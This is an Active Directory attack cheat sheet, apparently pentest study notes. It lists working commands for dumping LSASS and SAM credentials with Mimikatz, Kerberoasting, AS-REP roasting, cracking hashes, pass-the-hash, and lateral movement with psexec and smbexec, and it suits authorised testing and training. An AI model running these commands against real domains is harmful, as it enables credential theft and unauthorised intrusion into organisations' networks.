Active Directory

When testing active directory our goals should be to:

gain a foothold on a machine on the domain and elevate our privileges
enumerate the domain to find additional accounts, users, etc. that ideally increase our privilege level on the domain
gain access to the domain controller
persist on the domain (situation dependent)

Assuming that we've already enumerated the domain, we should now be focused on gathering credentials to move laterally within the domain.

Cached credential retrieval

Once you have local admin privileges on a domain joined computer you can dump the credentials stored in LSASS and the SAM database.

Mimikatz

mimikatz.exe
privilege::debug
sekurlsa::logonpasswords (dump lsass)
lsadump::sam (dump sam database)
sekurlsa::tickets (to dump tickets stored in memory)
kerberos::list (view cached kerberos tickets for the current user)

Attacks

Kerberoasting

If we find interesting service accounts while enumerating we can export the Kerberos 5 etype 23 hash for offline cracking.

Extracting SPN hashes
crackmapexec ldap $ldapIPaddress -u user -p pass --kerberoasting output.txt
kerberos::list /export 

Crack
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
hashcat -m 13100 hash.txt /path/to/wordlist -o output.txt

Alternatively, we can use the Invoke-Kerberoast.ps1, to enumerate SPNs, request tickets, and export them in a format ready for cracking.

AS-REP Roasting

The AS-REP roasting attack attempts to retrieve the Kerberos hash of users that don't require Kerberos pre-authentication.

Searching for AS-REP Roastable users
crackmapexec ldap $ldapIPaddress -u user -p 'pass' --asreproast output.txt
GetNPUsers.py domain/user:pass -dc-ip ipaddress -request format john -output.txt

Crack
john --format:krb5asrep output.txt
hashcat -m 18200 hash.txt /path/to/wordlist -o output.txt

Unconstrained delegation

Constrained delegataion

DCSync

Lateral movement

Moving laterally within a domain is fairly straightforward once you have credentials.

Windows remote management

winrs -remote:hostname -u:username -p:password (command)

PS-Remoting

PS-EXEC

psexec.py domain/user:password@ipaddress

SMB-EXEC

smbexec.py username:password@ipaddress

Pass the hash

Pass the hash allows attackers to authenticate to a remote system using an NTLM hash.

Many PTH tools require both the LM and NTLM hash as part of the command. If the LM hash is not available you can use a string of 32 zeros in its place.

Passing-the-hash Toolkit
pth-winexe -U Administrator%$LMHash:$NTLMHash //$ipaddress cmd

Mimikatz
privilege::debug
sekurlsa::pth /user:Administrator /domain:test.local /ntlm:$hash

SMBclient
smbclient.py -hashes LMHash:NTLMHash domain/user@$ipaddress

PS Exec
psexec.py -hashes :NTLMhash administrator@ipaddress

Overpass the hash

The overpass the hash technique utilizes the NTLM hash to obtain a Kerberos ticket, thus avoiding NTLM authentication.